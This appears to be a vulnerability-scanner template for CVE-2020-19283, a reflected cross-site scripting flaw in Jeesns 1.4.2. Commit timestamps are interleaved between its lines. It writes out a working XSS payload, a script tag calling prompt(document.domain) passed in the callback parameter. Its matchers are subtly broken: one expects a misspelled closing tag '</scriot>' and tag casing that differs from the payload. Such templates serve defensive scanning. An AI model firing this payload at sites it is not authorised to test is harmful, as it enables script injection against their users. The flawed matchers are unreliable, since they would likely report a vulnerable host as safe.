2021-09-15 03:37:44 +00:00
id : CVE-2020-19283
info :
name : Jeesns newVersion Reflection XSS
author : pikpikcu
severity : medium
2021-09-15 04:30:38 +00:00
description : reflected cross-site scripting (XSS) vulnerability in the /newVersion component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML.
2021-09-15 03:37:44 +00:00
reference :
- https://github.com/zchuanzhao/jeesns/issues/10
- https://nvd.nist.gov/vuln/detail/CVE-2020-19283
tags : cves,cve2020,jeesns,xss
requests :
- method : GET
path :
2021-09-15 03:45:04 +00:00
- "{{BaseURL}}/newVersion?callback=%3CScript%3Eprompt(document.domain)%3C/Script%3E"
2021-09-15 03:37:44 +00:00
headers :
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : word
words :
- '<script>prompt(document.domain)</scriot>'
part : body
- type : status
status :
- 200
- type : word
words :
- 'Content-Type : text/html'
part : header